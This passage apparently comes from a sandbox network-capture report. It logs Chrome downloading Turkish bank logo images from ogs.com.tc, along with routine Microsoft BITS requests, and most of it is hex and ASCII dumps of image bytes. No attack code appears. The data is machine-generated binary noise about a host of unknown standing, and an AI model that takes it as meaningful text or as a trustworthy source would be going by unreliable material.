    Data Ascii: PNGIHDR(xgAMAa cHRMz&u0`:pQ<PLTExyooijdeefML("SS|}TT0,$VWJJ.)HH52QR75


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    19192.168.2.549735185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC602OUTGET /assets/images/banks/turkiyefinans.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:11 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 4528
    Last-Modified: Thu, 23 May 2024 21:37:19 GMT
    Connection: close
    ETag: "664fb70f-11b0"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:11 UTC4528INData Raw: 52 49 46 46 a8 11 00 00 57 45 42 50 56 50 38 20 9c 11 00 00 30 5e 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 ea f4 54 28 04 84 b3 b7 70 bb 54 d8 ff ba 79 be 55 7f bb 7e 21 fe 73 cf f6 82 bd 2c f6 6f ef df 6b 3e ea fd 40 79 80 7e 94 ff 75 fc b1 ed 15 e6 03 f5 cb f6 bf b0 37 f6 ff 50 0f e8 1f d5 7a cb 3d 00 3f 68 3d 33 7f 64 7e 0c 7f 6c ff f0 7f 8c f8 09 fd 64 ff c3 9c 95 fe 43 b3 3f ee bf 92 dd 74 7e 01 f6 5b f6 e7 9f 4c 50 7e 3b f5 eb ee 9f d7 7f 66 7f 23 3e 1d ff 63 e0 9f 00 2f c5 bf 8d ff b2 fe 77 fd a7 fd af 03 c0 00 fa 91 ff 07 fb ff e3 7f a0 6f f9 3e 89 fc d5 7b 80 ff 28 fe 67 fe 63 fb 77 ee 6f f7 2f ff fe f4 9e 0d 14 00 fe 67 fd 33 fd 7f f8 ef 5c af f5 bf c9 ff 91 fd e0 f7 2b f5 07 fe 8f f3 bf 02 bf cf 7f b1 7f d6 fe f1 da 2f f7 6b d9 73 f6
    Data Ascii: RIFFWEBPVP8 0^*>I$E!T(pTyU~!s,ok>@y~u7Pz=?h=3d~ldC?t~[LP~;f#>c/wo>{(gcwo/g3\+/ks


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    20192.168.2.5497302.19.104.72443
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
    2024-05-25 22:18:10 UTC466INHTTP/1.1 200 OK
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    Content-Type: application/octet-stream
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    Server: ECAcc (lpl/EF06)
    X-CID: 11
    X-Ms-ApiVersion: Distribute 1.2
    X-Ms-Region: prod-eus-z1
    Cache-Control: public, max-age=64301
    Date: Sat, 25 May 2024 22:18:10 GMT
    Connection: close
    X-CID: 2


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    21192.168.2.549737185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:11 UTC592OUTGET /assets/images/banks/ykb.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:11 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:11 GMT
    Content-Type: image/jpeg
    Content-Length: 4042
    Last-Modified: Thu, 23 May 2024 21:37:20 GMT
    Connection: close
    ETag: "664fb710-fca"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:11 UTC4042INData Raw: 52 49 46 46 c2 0f 00 00 57 45 42 50 56 50 38 20 b6 0f 00 00 b0 58 00 9d 01 2a f4 01 c8 00 3e 49 24 91 45 a2 a2 21 92 1a 14 48 28 04 84 b3 b7 70 bb 58 8d 80 03 b1 ea 72 f9 7f 37 7b 6f f7 fd bd ca 73 ca f7 8b 7f d5 7f 51 fc 99 f9 e5 fd c7 fc 97 b3 6f 30 0f d7 5e 90 9e 60 3f 5f 7f 65 fd d5 7f bb 7e be fb 8e fd 8f fd 77 f8 00 fe 75 fd f3 d6 0b d4 e3 fb bf fc ef 60 7f e5 bf ed 3d 36 7f 74 be 17 ff af ff c8 fd bc f6 b8 cd 3d fe eb da af f9 1f c9 4e c8 3f 74 7b 53 cb f5 e9 7e d2 7e 77 fb b7 ed ef c6 df e4 3b d1 e0 11 eb 8f f3 9f 93 5f 96 5c 73 20 03 eb 47 fa 7f 10 0d 54 32 00 fe 69 fd 27 fe 27 1f 6d 01 3f 96 ff 72 ff c9 fe 2f d9 5f ea 9f 43 7f 51 ff ec ff 33 f0 2d fa e7 ff 4f fb cf 6a cf 45 01 4b e7 7e 7d c1 7b 82 f7 05 ee 0b dc 17 b8 2f 70 5e e0 bd c1 7b 82 f7
    Data Ascii: RIFFWEBPVP8 X*>I$E!H(pXr7{osQo0^`?_e~wu`=6t=N?t{S~~w;_\s GT2i''m?r/_CQ3-OjEK~}{/p^{


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    22192.168.2.549738185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:11 UTC595OUTGET /assets/images/banks/ziraat.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:11 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:11 GMT
    Content-Type: image/jpeg
    Content-Length: 3510
    Last-Modified: Thu, 23 May 2024 21:37:21 GMT
    Connection: close
    ETag: "664fb711-db6"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:11 UTC3510INData Raw: 52 49 46 46 ae 0d 00 00 57 45 42 50 56 50 38 20 a2 0d 00 00 b0 52 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 35 b8 d8 50 09 09 67 6e e1 76 b1 1f c8 1a 4b e6 4f 7d 1f 08 77 67 6e 3a 74 f2 7c e2 6f ed 5f 95 5f e7 3b 48 f9 80 7e 92 7f 83 fc aa ed 01 e6 03 f6 1f f5 df da 1b fd 1f f6 ef 70 1f a7 9f e7 7d c0 3f 52 7a c2 fd 03 3f 5b 7d 34 7f 61 fe 0d ff 64 ff 6b be 01 bf 58 7e ff f6 50 bc bf fd e3 b5 5f ec 3f 92 fe 7f f8 9c f0 cf b0 9f 8b ff 11 d9 93 eb 7f e4 4f 53 bf 91 fd 7a fb d7 e5 d7 e5 47 c9 5f e4 7c 1b f8 e1 fc f7 a8 47 e3 1f c7 ff b5 fe 5a fe 58 71 dd 69 1e 60 5e bd 7c f7 fd 27 f7 bf 1c ad 4d 7b ed ec 01 fc bb fa 4f fa de 41 ef 2a f6 02 fe 89 fe 03 f5 e3 dd 8b fb 3f fd 7e 60 3e 94 ff dd fe 97 e0 2f f9 c7 f6 8f f9 5e b9 de c9 bd 20 3f 70 03 2d
    Data Ascii: RIFFWEBPVP8 R*>I$F"!!5PgnvKO}wgn:t|o__;H~p}?Rz?[}4adkX~P_?OSzG_|GZXqi`^|'M{OA*?~`>/^ ?p-


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    23192.168.2.549739185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:11 UTC592OUTGET /assets/images/banks/teb.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:12 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:11 GMT
    Content-Type: image/jpeg
    Content-Length: 22502
    Last-Modified: Thu, 23 May 2024 21:37:19 GMT
    Connection: close
    ETag: "664fb70f-57e6"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:12 UTC16100INData Raw: ff d8 ff e1 07 53 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 37 20 31 39 3a 35 39 3a 35 38 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: SExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:27 19:59:58"
    2024-05-25 22:18:12 UTC6402INData Raw: dc 48 ed 8a 1c b2 b7 94 69 b9 7b 9a f0 86 c5 6a 8a ea 19 78 aa c5 1f e2 5d 2a 76 8b c4 b5 4b 6d 78 29 93 30 94 bc ab 12 39 a9 1c 8f 4a a7 b9 99 74 aa 43 41 2a c0 b0 16 42 5d 5b 46 ff 00 15 0d 15 a9 a0 3b c5 c0 90 90 55 20 6a 29 b3 0a 75 35 56 85 a8 29 2a 4e 12 95 24 90 53 84 ca 58 48 29 29 fc 24 61 20 11 28 be 28 b2 8c ae 9d 6f 66 15 0e 25 b6 d0 80 54 a5 29 6a 09 48 00 5a 49 51 01 20 5a a5 10 91 69 11 cc 34 39 9b ac 35 93 e5 25 29 ab ad 2a 22 99 b7 0a 12 a2 ca 16 a4 85 3a f9 51 08 6d 96 d0 a7 56 48 5a 5b 2d 85 29 2e 21 87 71 b4 09 00 ca 53 1a e5 33 da 7a 89 16 c5 f1 7c 5f 19 4b c0 da 9a 86 cf f7 d3 1c 9e e6 ba 34 fe d2 ba 4b 9c de fd 11 49 fc f5 30 8c c1 33 ff 00 19 67 7a 89 80 a0 7f 3e b0 75 83 71 1a 44 72 c5 0e 59 cd b5 14 1f 31 72 4c c1 b6 96 a6 dd 52
    Data Ascii: Hi{jx]*vKmx)09JtCA*B][F;U j)u5V)*N$SXH))$a ((of%T)jHZIQ Zi495%)*":QmVHZ[-).!qS3z|_K4KI03gz>uqDrY1rLR


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    24192.168.2.549740185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:11 UTC592OUTGET /assets/images/banks/ptt.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:12 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:11 GMT
    Content-Type: image/jpeg
    Content-Length: 5260
    Last-Modified: Thu, 23 May 2024 21:37:18 GMT
    Connection: close
    ETag: "664fb70e-148c"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:12 UTC5260INData Raw: 52 49 46 46 84 14 00 00 57 45 42 50 56 50 38 20 78 14 00 00 30 5f 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 79 e4 70 28 04 84 b1 b7 70 bb 55 fe 57 da fb 4a b2 b7 63 fc 8e fc b5 f9 6d a9 ff 55 fc 5d fd 2f f6 93 9d 8e b2 f2 ae f1 af cb ff d0 ff 6d fd cd ff 0d ff ff ff ff df af f3 3f db bd 86 7e 8e ff 2d ee 01 fa 67 fe 5f fa ef f8 ef f7 3f bf ff 30 1e a2 ff 73 3d 40 7f 3c fe f5 ff 87 fc 7f bb 1f f6 bf d2 df 72 1f b3 bf f0 3f c0 7c 00 7f 47 fe ed e9 6f ec 2d fb 93 ec 0d fc fb fc 2f fe 5f 5c af fc 5f ec be 0f 7f ac 7f a7 fd a4 f8 1b fe 85 fd a7 fe 7f e7 bf c8 07 ff ff 6c ce 91 7e a1 ff 76 ed 4f fb 5f da d7 65 c7 a7 7d be e5 1f d4 7e 65 7f 21 fb 4f f9 bf ef 5f b8 9f 95 ff 25 f7 b3 f1 4b fb df 50 8f c6 ff 95 7f 91 fe c1 fb 8d c2 eb 67 fd 02 3d da fa 4f
    Data Ascii: RIFFWEBPVP8 x0_*>I$E!yp(pUWJcmU]/m?~-g_?0s=@<r?|Go-/_\_l~vO_e}~e!O_%KPg=O


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    25192.168.2.5497422.19.104.72443
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:11 UTC239OUTGET /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
    Range: bytes=0-2147483646
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
    2024-05-25 22:18:11 UTC534INHTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    ApiVersion: Distribute 1.1
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
    Cache-Control: public, max-age=64222
    Date: Sat, 25 May 2024 22:18:11 GMT
    Content-Length: 55
    Connection: close
    X-CID: 2
    2024-05-25 22:18:11 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    26192.168.2.549741185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:11 UTC593OUTGET /assets/images/banks/odea.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:12 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:11 GMT
    Content-Type: image/jpeg
    Content-Length: 24936
    Last-Modified: Thu, 23 May 2024 21:37:17 GMT
    Connection: close
    ETag: "664fb70d-6168"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:12 UTC16100INData Raw: ff d8 ff e1 0a 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 33 34 3a 33 34 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ZExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:34:34"
    2024-05-25 22:18:12 UTC8836INData Raw: 2a cd d2 20 6e c7 29 4a a1 4a 72 c9 59 25 a2 61 a8 3c 9c c6 d6 86 ae f2 07 32 88 5d 73 43 95 d4 bb 77 26 ae e9 54 52 3e 5d cc 80 50 af 3f 66 bb 04 9b 38 55 67 51 4f da b8 66 aa 8b 90 8d dd bb fe b2 78 d7 b3 69 78 75 a2 37 91 79 6c 45 ca d9 95 5a e6 29 36 79 2c f6 cd 5e d0 ab f2 55 b3 d8 e0 1c b2 99 61 18 fe cb 23 14 ba a2 d9 74 54 39 da 90 a2 6f 01 31 4c f6 cd 75 b3 58 6e 16 49 35 3d 59 1b 05 a6 6a 4a c1 39 20 a8 88 8f a8 f6 5a 59 cb b7 ee d4 11 11 f7 a8 a1 87 df d0 4f bf a5 5b 58 c1 09 0a a0 4d 3c ad cc b6 89 14 cf e2 24 50 24 56 64 46 62 43 01 83 b0 f9 f6 1e e1 d3 49 28 c7 8e e3 a4 63 dc a2 f1 84 83 07 0b 34 7a c9 e3 65 0a b3 77 4d 1d 37 3a 6b b6 72 dd 52 01 88 72 18 a6 21 80 04 04 04 3a cb fe 5f fc db d3 67 b6 4c ab 68 97 63 9e e1 7a be 87 2a e6 77 45
    Data Ascii: * n)JJrY%a<2]sCw&TR>]P?f8UgQOfxixu7ylEZ)6y,^Ua#tT9o1LuXnI5=YjJ9 ZYO[XM<$P$VdFbCI(c4zewM7:krRr!:_gLhcz*wE


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    27192.168.2.549743185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:11 UTC595OUTGET /assets/images/banks/isbank.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:12 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:11 GMT
    Content-Type: image/jpeg
    Content-Length: 4990
    Last-Modified: Thu, 23 May 2024 21:37:16 GMT
    Connection: close
    ETag: "664fb70c-137e"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:12 UTC4990INData Raw: 52 49 46 46 76 13 00 00 57 45 42 50 56 50 38 20 6a 13 00 00 70 60 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 22 96 08 f8 50 09 09 65 6e fc 7c 99 ab eb 2d 3e 87 82 4b f5 ef e6 1f ba 3f d8 7d e4 2a 0f d8 3f aa fe c6 fe d7 ee 53 b2 b8 ba 7a ad ec df e6 7f a3 ff 83 fd ad f7 93 fe ef d8 77 e6 4f fa be e0 1f a8 5f ec bf b2 fa dd 7a 8b fd c0 f5 01 fd 17 fc e7 fd cf ee 3e ec 3f dc bf 5b 3d c1 fe ad ff d9 ff 11 fe 1b e4 03 f9 f7 f7 0f fd 1e cf 1f e1 bf ff fb 8d fe e1 7b 02 7f 39 ff 2d ff d3 d9 c3 fe 6f ed 7f c1 77 f6 4f f6 3f b7 3f 03 5f b2 7f f9 fd 80 3f ff fa 80 7f ff eb 17 ea 1f f4 4e d7 bf bc 7e 52 fa 0b e4 4f c6 fe d3 f2 9e e9 7f f6 5e 4a be bd 7d db fa 7f ee 37 e5 77 de 7f db 3f d6 fe 35 f9 b7 f0 d3 50 2f c6 3f 91 7f 77 fc b4 e1 a1 00 1f 93 7f 44 ff
    Data Ascii: RIFFvWEBPVP8 jp`*>I$F"!"Pen|->K?}*?SzwO_z>?[={9-owO??_?N~RO^J}7w?5P/?wD


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    28192.168.2.549745185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:12 UTC363OUTGET /assets/images/banks/vakif.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:12 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:12 GMT
    Content-Type: image/jpeg
    Content-Length: 4414
    Last-Modified: Thu, 23 May 2024 21:37:20 GMT
    Connection: close
    ETag: "664fb710-113e"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:12 UTC4414INData Raw: 52 49 46 46 36 11 00 00 57 45 42 50 56 50 38 20 2a 11 00 00 90 5b 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 46 22 a2 21 21 22 32 48 d8 50 09 09 69 6e e1 77 61 1f c8 1a 5c 7d 4b f2 1f f2 03 9e d7 69 3b ef be f8 5d 3a 8c fb ef e4 97 fa ae d0 1e 60 1f a4 1f e6 7a 91 79 80 fe 53 fd 4f fd c7 f7 2f 7c 7f 40 1e 80 1f aa 3d 60 1f a8 1e c1 1f b4 7e 98 1f b7 3f 05 df b3 7f b5 ff 01 7f ca 7f b0 6a ab f9 97 fb 37 64 bf d2 ff a3 fe b8 7f 5c ec 3a ef 37 ad 9c ad e2 83 f1 0f a9 bf 6b fe bf fb 25 fd bf f7 4b e2 8f ea 5f 91 1f 8d de cd f0 02 fc 47 f8 ef f6 0f cb 5f c8 fe 34 c0 01 fa 5f f5 6f f0 ff 99 1f d8 fd 07 3f 6c f4 27 ec a7 fb bf 70 0f e5 1f cd bf cc 7e 67 fa c7 7f 20 f1 6f a0 07 f1 8f ec 1f ea 7e f7 7e 37 3f d1 ff 43 fe 3b f7 33 db bf cf 7f f1 ff c6 7f 99 f9 0c fe 5d fd
    Data Ascii: RIFF6WEBPVP8 *[*>I$F"!!"2HPinwa\}Ki;]:`zySO/|@=`~?j7d\:7k%K_G_4_o?l'p~g o~~7?C;3]


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    29192.168.2.549749185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:12 UTC364OUTGET /assets/images/banks/kuveyt.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:12 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:12 GMT
    Content-Type: image/jpeg
    Content-Length: 4050
    Last-Modified: Thu, 23 May 2024 21:37:17 GMT
    Connection: close
    ETag: "664fb70d-fd2"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:12 UTC4050INData Raw: 52 49 46 46 ca 0f 00 00 57 45 42 50 56 50 38 20 be 0f 00 00 f0 55 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 95 18 f0 50 09 09 65 6e e1 76 b1 1f d4 dd 7d 13 97 b5 7e 5a 7b 2a 55 3f a9 fe 10 f4 00 fb 00 e9 17 a1 3c b5 bc 4b f3 0f f3 5f dc 3f 28 fe 80 7f 6e fe 81 ec 93 f3 1f ea 4f c0 17 e9 47 f8 ef ee 9e b6 9e a5 3c c0 7f 39 fe cf ff 17 fc 77 ba d7 f8 af d4 df 71 7f b2 1e c0 1f d1 7f c1 ff da f5 8a f6 11 ff 01 ff 5b d8 03 f6 3b ff ff b2 af fb 6f d9 6f 82 6f da bf db 9f 81 1f e7 5f e0 3f ea 7e 7f f7 00 75 13 f4 6b fb 97 6a 3f db ff 24 fa e5 7c d5 ec 67 30 27 a2 fa ef f9 df cc af 61 ff c2 fe 45 79 bf c0 0b d5 ff e0 b7 b4 40 07 e4 ff cf bf d7 7d aa fa 38 7f 2b e8 77 88 07 ea ef fa 7e 35 af 42 f6 03 fe 6f fd cb f5 bb d8 63 fc 9f 2d 7f 4f fe cd fc 09
    Data Ascii: RIFFWEBPVP8 U*>I$F"!!Penv}~Z{*U?<K_?(nOG<9wq[;ooo_?~ukj?$|g0'aEy@}8+w~5Boc-O


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
